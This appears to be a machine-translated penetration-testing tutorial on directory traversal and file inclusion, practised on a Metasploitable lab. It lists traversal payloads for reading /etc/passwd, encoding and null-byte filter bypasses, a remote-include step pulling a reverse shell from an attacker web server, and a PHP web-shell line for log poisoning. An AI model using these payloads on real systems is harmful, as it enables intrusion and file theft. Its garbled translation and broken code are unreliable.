Manual vulnerability Mining
Vulnerability type
#Directory Traversal directory Traversal "read files on this machine's operating system"
Users can read the Web root directory "default:/var/www/" Other operating system files (such as:/etc/passwd/) through the browser/url address or parameter variable contents. Root cause: Directory permissions are not strictly restricted
#File include file contains "1, include local file contains lfi;2, remote system file contains RFI (can be passed in Trojan)"
Typically, such as the Include function, you can include directories outside the Web root directory. Root cause: The Include function restricts input variables
#此两种漏洞类型的利用方法和实现效果完全相同.
Note: Some attack vector dictionaries are integrated by default in Kali,/usr/share/wfuzz/wordlist/vulns
##################################################################
By default, metasploitable only file contains a vulnerability, no remote file contains a vulnerability
#修改metasploitable配置文件
sudo vi/etc/php5/cgi/php.ini
/allow_url Search
Sudo/etc/init.d/apache2 Restart Restart Apache Service
##########################################################################
Exploit exploits
First, observe features, characteristics, etc. "such as: page=a.php home=b.html file=content"; then the form or URL address
Classic test methods
/etc/passwd/a file that can be read by an ordinary user, often used for testing
1. file=. /.. /.. /.. /etc/password
Resolution: There are two special directories for both Windows and Linux
. Represents the current directory
.. /indicates the parent directory of the current directory (top level directory)
“.. /"The more the better, is because you can jump to the root directory
#也可以直接使用绝对路径? page=/etc/passwd, but the directory traversal vulnerability is not used, you need to use the ".. /”
2,? page=file:///etc/passwd "File system access, files are required after the absolute path"/etc/passwd
3. home=main.cgi "Source content/configuration information, etc."
4. page=http://www.a.com/1.php (contains other web files) "Remote file contains"
You can make a Web server, put a bounce shell on it
? page=http://1.1.1.1/../../../../dir/file.txt
Encoding bypasses character filtering
When prompted: Cannot find the file, you should be able to determine the filtering mechanism
Prior to php5.3, there was this bypass restriction
“.” "%00" (popular valid, denotes control) "In the PHP language format, when you encounter% 00, then ignore the contents of its back"
For example:? flie=a.doc%00.php
use a variety of coding attempts "every character can do coding attempts, usually, the ASCII code below 128 will not be filtered"
Special characters: "." " /"#英文字符肯定不会被过滤
######################################################################
#不同操作系统的路径特征字符
#类UNIX系统
Root directory:/
Directory-level delimiter:/
#windows系统
C +
Or
######################################################################
Coding
Most commonly used: URL encoding "If a layer of code is not enough to bypass, you can use double or multilayer URL encoding, if: ciphertext can be decoded by the server"
Purpose: The target server can decode the encoding normally, and can see what it wants to see, and can bypass
%2E%2E%2F decoding: /
%2E%2E%5C decoding: \
%252E%252E%255C decoding: \ "Double-layer encoding: Special character% is encoded as%25"
Unicode/utf-8 "Non-English character encoding"
.. %C0%AF decoding: /
.. %u2216
.. %C1%9C decoding: \
#可使用在线工具
######################################################################################
Characters that may be used by other system paths
? File.txt ...
? File.txt<spaces> #空格
? File.txt "" "
? file.txt<<<>>><
?./././file.txt
? nonexistant/. /file.txt #输入一个不存在的目录 "Many operating systems have been filtered"
UNC path "Windows System File Share"
? \\1.1.1.1\path\to\file.txt
Note: The common characters can be encoded in advance, in 22 or any combination, form a dictionary file, using the intruder in Burpsuite to attack can improve efficiency
######################################################################################
Exception: Unable to view any sign from the URL, its cookie in the HTTP request header
Code:
Attack: "Inject location for cookie information"
Results:
Note: Any variable must be validated
##########################################################################################
Example Demo
Local file contains Lfi
View Files
Code Execution "Special case: Implementing code injection through the server's access log"
<?php echo shell_exec ($_get[' cmd ');?
Apache access.log " Premise: Other users have read permission to the file "
And then access the file in the browser
############################################################### ##############
Note: In a Linux system, when you assign permissions to a file, ensure that the same permissions are assigned to its hierarchical directory
# # # ##########################################################################
Remote file contains RFI "relatively local inclusion, low probability"
Verify:
Harm:
Low grade
Medium level
Bypass the idea "filter only once"
1. Coding
2. Mixed characters
High level limit
Little white Diary 37:kali Penetration Testing Web Penetration-Manual vulnerability Mining (iii)-directory traversal, file inclusion